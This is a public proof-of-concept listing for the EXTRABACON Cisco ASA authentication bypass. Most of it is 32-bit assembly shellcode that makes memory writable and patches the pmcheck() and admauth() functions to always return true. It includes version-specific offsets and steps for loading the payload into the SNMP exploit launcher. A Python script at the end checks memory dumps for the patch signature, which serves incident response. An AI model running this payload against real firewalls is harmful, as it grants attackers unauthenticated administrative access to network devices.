;
; Cisco ASA Authentication Bypass (EXTRABACON) Better Shellcode (69 bytes)
;
; Copyright: (c) 2016 RiskSense, Inc. (https://risksense.com)
; License: http://opensource.org/licenses/MIT
; Release Date: September 15, 2016
;
; Author: Sean Dillon (2E3C8D72353C9B8C9FF797E753EC4C9876D5727B)
;
; Description:
; This is not the same shellcode as the Equation Group version,
; but accomplishes the same task of disabling the auth functions
; in fewer stages/bytes. Particularly, it is 69 bytes in one stage
; instead of 200+ bytes spread across 2 stages.
;
; Build/Run:
; 1) $ nasm shelldisable.nasm
; 2) copy resulting shellcode into preamble_byte/preamble_snmp vars
; 3) Change launcher_snmp to 6 nops (or remove entirely)
;
; Note: The offsets given are for 9.2(3), not part of the original release
;

BITS 32

SAFERET_OFFSET  equ 0x9277386   ; where to continue execution

PMCHECK_BOUNDS  equ 0x9b78000   ; page-aligned address passed to mprotect for pmcheck()
PMCHECK_OFFSET  equ 0x9b78010   ; location of pmcheck()

ADMAUTH_BOUNDS  equ 0x8085000   ; page-aligned address passed to mprotect for admauth()
ADMAUTH_OFFSET  equ 0x8085a40   ; location of admauth()

; we must patch pmcheck() and admauth() to always return true
;   xor eax, eax = 31 c0
;   inc eax      = 40
;   ret          = c3
PATCH_CODE      equ 0xc340c031  ; stored little-endian, so the bytes land as 31 c0 40 c3 (gotta love endianness)

; we need to fix the function frame to continue normal operation
;   eax = 0x0
;   esi = 0x0
;   edi = 0x0b
;   ebx = 0x10
;   ebp = [esp - 0x4 (ret)] + 0x??
FIX_EBP         equ 0x48        ; this is 0x58, etc. in some versions
FIX_EDI         equ 0x0f0f0f0b  ; seems static?
FIX_EBX         equ 0x10        ; seems static?

_start:
    ; these are registers we have to clean up, so we can null them before save
    xor eax, eax
    xor ebx, ebx
    xor esi, esi
    xor ecx, ecx                    ; ecx is a volatile register

    pusha                           ; save all registers

    add ch, 0x10                    ; ecx = 0x1000 (length)
    add dl, 0x7                     ; edx = 0x7    (PROT_READ|PROT_WRITE|PROT_EXEC)
    add al, 0x7d                    ; eax = 0x7d   (sys_mprotect)

    push eax                        ; save eax for second call
    mov ebx, PMCHECK_BOUNDS         ; ebx = page boundary for mprotect
    int 0x80                        ; sys_mprotect(PMCHECK_BOUNDS, 0x1000, 0x7)

    pop eax                         ; eax = 0x7d
    mov ebx, ADMAUTH_BOUNDS         ; second function page align
    int 0x80                        ; sys_mprotect(ADMAUTH_BOUNDS, 0x1000, 0x7)

    push PATCH_CODE
    pop eax
    mov dword [PMCHECK_OFFSET], eax ; write patch code to both functions
    mov dword [ADMAUTH_OFFSET], eax

    popa                            ; restore all registers

    push SAFERET_OFFSET             ; push the safe return address

    ; these registers are pre-xored
    add bl, FIX_EBX
    mov edi, FIX_EDI
    mov ebp, esp
    add ebp, FIX_EBP

    ret                             ; return to safe address
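The listing above documents exactly what a compromised ASA looks like in memory: the first four bytes of pmcheck() and admauth() become 31 c0 40 c3 (xor eax,eax / inc eax / ret). That is a concrete indicator an incident responder can check for in a memory dump. The script below is an added example and is not part of the original shellcode or the RiskSense release; it uses the 9.2(3) offsets and PATCH_CODE from the listing, assumes the dump is presented as a dict of {base_address: bytes} regions (a layout chosen for this example), and the "clean" function prologue bytes in the sample images are constructed, not taken from real ASA firmware.

```python
import struct

# Addresses from the listing above (Cisco ASA 9.2(3)); other builds differ.
PMCHECK_OFFSET = 0x9b78010
ADMAUTH_OFFSET = 0x8085a40
PATCH_CODE = 0xc340c031


def patch_bytes(patch_code: int = PATCH_CODE) -> bytes:
    """Little-endian encoding of the dword the shellcode writes.

    The immediate 0xc340c031 stored as a 32-bit value lands in memory as
    31 c0 40 c3, which decodes to: xor eax,eax ; inc eax ; ret.
    """
    return struct.pack("<I", patch_code)


def read_dword(regions: dict, addr: int):
    """Return the 4 bytes at virtual address addr, or None if the dump
    does not cover that address. regions is {base_address: bytes}."""
    for base, data in regions.items():
        if base <= addr and addr + 4 <= base + len(data):
            off = addr - base
            return data[off:off + 4]
    return None


def check_auth_functions(regions: dict, targets: dict = None) -> dict:
    """Report, per function, whether its entry has been overwritten with
    the always-return-true stub. A missing page counts as not patched
    (the caller should treat an incomplete dump as inconclusive)."""
    if targets is None:
        targets = {"pmcheck": PMCHECK_OFFSET, "admauth": ADMAUTH_OFFSET}
    signature = patch_bytes()
    return {name: read_dword(regions, addr) == signature
            for name, addr in targets.items()}


# --- constructed sample dumps (not real ASA memory) -----------------------
def make_region(base: int, addr: int, entry: bytes) -> bytes:
    """Build one 0x1000-byte page (the size the shellcode mprotects) with
    the given bytes placed at the function entry address."""
    page = bytearray(0x1000)
    page[addr - base:addr - base + len(entry)] = entry
    return bytes(page)


# Typical x86 prologue, push ebp ; mov ebp,esp, used here as a stand-in for
# an unmodified function entry. Constructed for this example.
CLEAN_PROLOGUE = b"\x55\x89\xe5"

CLEAN_IMAGE = {
    0x9b78000: make_region(0x9b78000, PMCHECK_OFFSET, CLEAN_PROLOGUE),
    0x8085000: make_region(0x8085000, ADMAUTH_OFFSET, CLEAN_PROLOGUE),
}

PATCHED_IMAGE = {
    0x9b78000: make_region(0x9b78000, PMCHECK_OFFSET, patch_bytes()),
    0x8085000: make_region(0x8085000, ADMAUTH_OFFSET, patch_bytes()),
}


if __name__ == "__main__":
    print("patch signature:", patch_bytes().hex())
    print("clean image:   ", check_auth_functions(CLEAN_IMAGE))
    print("patched image: ", check_auth_functions(PATCHED_IMAGE))
```

Because the patch is written to running memory only, the check has to be run against a memory image rather than the on-disk firmware; a reboot restores the original code, which is also why a dump taken after a restart will read clean.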